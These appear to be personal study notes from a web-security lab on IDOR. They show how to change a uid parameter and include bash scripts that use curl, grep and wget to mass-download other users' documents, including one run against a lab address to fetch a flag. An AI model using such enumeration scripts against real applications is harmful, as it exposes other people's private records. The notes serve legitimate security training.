# Intro - Once we identify a potential IDOR, we can start testing it with basic techniques to see whether it would expose any other data - With respect to advanced IDOR attacks, we need to better understand how the web app works, how it calculates its object references, and how its access control system works to be able to perform advanced attacks that may not be exploitable with basic techniques # Insecure Parameters - Our web application assumes that we are logged in as an employee with user id `uid=1` to simplify things - This would require us to log in with credentials in a real web app ![[images/Pasted image 20260110193324.png]] - Once we click on Documents, we are redirected to `/docouments.php` ![[images/Pasted image 20260110193351.png]] - When we get to the `Documents` page, we see several documents that belong to our user - These can be files uploaded by our user or files set for us by another department (e.g., HR Department) - Checking the file links by hovering with the mouse cursor, we see that they have individual names ```html /documents/Invoice_1_09_2021.pdf /documents/Report_1_10_2021.pdf ``` - We see that the files have a predictable naming pattern, as the file names appear to be using the user `uid` and the month/year as part of the file name, which may allow us to fuzz files for other users - This is the most basic type of IDOR vulnerability and is called `static file IDOR` - However, to successfully fuzz other files, we would assume that they all start with `Invoice` or `Report`, which may reveal some files but not all - So, we need to look for a more solid IDOR vulnerability - We see that the page is setting our `uid` with a `GET` parameter in the URL as (`documents.php?uid=1`) - If the web app uses this `uid` GET parameter as a direct reference to the employee records it should show, we may be able to view other employees' documents by simply changing this value - If the back-end end of the web application `does` have a proper access control system, we will get some form of `Access Denied` - However, given that the web application passes as our `uid` in clear text as a direct reference, this may indicate poor web application design, leading to arbitrary access to employee records - When changing `uid` to `?uid=2`,  we don't notice any difference in the page output, as we are still getting the same list of documents, and may assume that it still returns our own documents ![[images/Pasted image 20260110193758.png]] - However, when inspecting the docs more closely, we see that they are different documents belonging to the employee with `uid=2` ```html /documents/Invoice_2_08_2020.pdf /documents/Report_2_12_2020.pdf ``` # Mass Enumeration - We can try manually accessing other employee documents with `uid=3`, `uid=4`, and so on - However, manually accessing files is not efficient in a real work environment with hundreds or thousands of employees - Instead, we can `Burp Intruder` or `ZAP Fuzzer` to retrieve all files or write a small bash script to download all files, which is what we will do - [CTL+SHIFT+C] to enable the `element inspector`, and then click on any of the links to view their HTML source code, and we will get the following ```html <li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li> <li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li> ``` - Based on the above, we see that each link starts with `<li class='pure-tree_link'>`, so we may `curl` the page and `grep` for this line as follows ```bash curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep "<li class='pure-tree_link'>" ``` - We can use a `Regex` pattern that matches strings between `/document` and `.pdf`, which we can use with `grep` to only get the document link ```bash curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "\/documents.*?.pdf" ``` - Finally, we can use a `for` loop to loop over the `uid` parameter and return the document of all employees, and then use `wget` to download each document link ```bash #!/bin/bash url="http://SERVER_IP:PORT" for i in {1..10}; do for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do wget -q $url/$link done done ``` # Exercise - `ping` test![[images/Pasted image 20260110194641.png]] - `nmap` scan ![[images/Pasted image 20260110194649.png]] - visit `/documents.php` - source code ![[images/Pasted image 20260110195056.png]] - visit `/documents.php?uid=1` - use below `for` loop to get a list of documents of the first 20 user uid's in `/documents.php` where a POST method and the uid parameter are specified ```bash #!/bin/bash url="http://83.136.255.170:48584" for i in {1..20}; do for link in $(curl -s -X POST "$url/documents.php" -d "uid=$i" | grep -oP "/documents.*?\.[a-z]{3}"); do wget -q $url$link done done ``` - After running the above command we have many Report and Invoice files in the local directory as well as a `flag.txt` files ![[images/Pasted image 20260111195554.png]] - `cat flag.txt`